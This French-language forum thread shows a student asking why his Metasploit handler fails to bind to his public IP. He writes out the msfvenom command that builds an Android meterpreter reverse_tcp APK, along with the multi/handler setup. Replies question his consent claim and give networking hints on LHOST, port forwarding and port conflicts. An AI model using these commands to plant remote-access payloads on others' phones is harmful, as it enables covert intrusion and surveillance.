IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Linux Discussion :

Problème mettre mon ip public sur MetaSploit


Sujet :

Linux

  1. #1
    Nouveau Candidat au Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Mai 2018
    Messages
    1
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Étudiant
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Mai 2018
    Messages : 1
    Points : 0
    Points
    0
    Par défaut Problème mettre mon ip public sur MetaSploit
    Bonjour la communautée ;-),

    Alors avant que vous pétiez un câble en disant que vient sur ce forum pour faire quelque chose d´illégal, je tiens juste a vous dire que ce que je fais n´as rien d´illegal vu que je le fait sur mon gsm et celui de mon frère; donc des personnes consantante ^^. Je suis un passionné de CyberSécuritée et je compte même en faire mon métier en sortant du Lycée :-D.
    Du coup je peux revenir a ma question xD

    En fait, Je suis sur kali Linux, à ma disposition j'ai mon Pc, mon smartphone android. Je veux lancer une attaque de Type MeterPreter, classique en somme. Donc voilà:

    Pour creer mon payload je fais :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    ~ msfvenom -p android/meterpreter/reverse_tcp LHOST=[Mon IP public] LPORT=80 R > app.apk
    Ensuite je le récupère l'apk que j'installe sur le smartphone.

    Reste plus qu'à récupérer le signal :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
     ~ msfconsole 
    ~ use exploit/multi/handler 
    ~ set payload android/meterpreter/reverse_tcp 
    ~ set LHOST [ip public] 
    ~ set LPORT 80 
    ~ exploit
    Et là j'obtiens :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    Handler failed to bind to xx.xxx.xxx.xxx:80 
    Started reverse handler on 0.0.0.0:80 
    Starting the payload handler...
    Donc ma question est, "Comment puis-je faire pour que mon IP public soit utiliser par Metasploit ?
    Sachant que au préalable j´ai ouvert mes ports. (Je possède une BBOX-3 de chez Proximus qui est un fournisseur Belge, mais le problème ne vient pas de ma box).

    Merci d´avance ;-)

  2. #2
    Expert éminent sénior Avatar de Flodelarab
    Homme Profil pro
    Inscrit en
    Septembre 2005
    Messages
    5 266
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Charente (Poitou Charente)

    Informations forums :
    Inscription : Septembre 2005
    Messages : 5 266
    Points : 13 526
    Points
    13 526
    Par défaut
    Bonjour

    Je n'ai pas compris le passage "C'est mon frère donc il est consentant".

  3. #3
    Invité
    Invité(e)
    Par défaut
    Parce que LHOST est la variable d'environnement à appliquer à ton IP interne, certainement pas ta publique...

    -VX
    Dernière modification par N_BaH ; 10/05/2018 à 21h42. Motif: suppression citation intégrale inutile

  4. #4
    Expert éminent Avatar de BufferBob
    Profil pro
    responsable R&D vidage de truites
    Inscrit en
    Novembre 2010
    Messages
    3 037
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : responsable R&D vidage de truites

    Informations forums :
    Inscription : Novembre 2010
    Messages : 3 037
    Points : 8 404
    Points
    8 404
    Par défaut
    salut,

    Citation Envoyé par Teckinfor Voir le message
    Alors avant que vous pétiez un câble en disant que vient sur ce forum pour faire quelque chose d´illégal, je tiens juste a vous dire que ce que je fais n´as rien d´illegal
    sans dec ? ah bah ça va alors, on est rassurés...

    exactement la même chose que je disais y'a +10 ans (MSF existait à peine) aux wannabe de l'époque qui sortaient la même excuse; vaut mieux apprendre l'informatique qu'apprendre le "hacking", la sécu c'est pour ceux qui sont déjà balèzes en informatique, un peu comme une spécialisation, c'est pas un truc par lequel on est censé commencer, là il manque clairement des connaissances de base en réseaux...

    Citation Envoyé par vxlan.is.top Voir le message
    Parce que LHOST est la variable d'environnement à appliquer à ton IP interne, certainement pas ta publique...
    c'est sûr ça ? parce que vu qu'il utilise un connect-back ça semblerait assez logique qu'il mette son IP publique un moment donné, et c'est la box ensuite qui forward le port vers l'IP LAN locale, mais bon ça fait des années que j'ai plus utilisé msf peut-être que c'est pas cette logique là je me souviens plus

    par contre je sais pas comment c'est monté de chaque coté, on est d'accord qu'il faut forwarder les ports, à la fois sur la victime et sur l'attaquant pour qu'il puisse récupérer le shell ? ça se fait pas tout seul faut le conf explicitement sur chacune des box, et ça marchera évidemment qu'à travers wifi, s'assurer qu'on utilise pas la 3G/4G sans faire gaffe par exemple etc.

    sinon de mémoire sous Android y'avait un sniffer qui permettait de capturer le trafic en pcap, T-Shark je crois ça s'appelait, ça peut permettre de debug pour voir où ça coince

    Edit:
    je remarque ça maintenant :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    Handler failed to bind to xx.xxx.xxx.xxx:80
    ça pourrait pas venir du fait qu'il y a déjà un service en écoute sur le port 80 par exemple ?

Discussions similaires

  1. [DW8] Problème de publication sur dreamweaver 8
    Par isa95240 dans le forum Dreamweaver
    Réponses: 1
    Dernier message: 17/02/2008, 11h52
  2. Réponses: 3
    Dernier message: 26/04/2006, 21h45
  3. Réponses: 11
    Dernier message: 25/11/2005, 09h52
  4. Réponses: 6
    Dernier message: 29/10/2005, 14h10

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo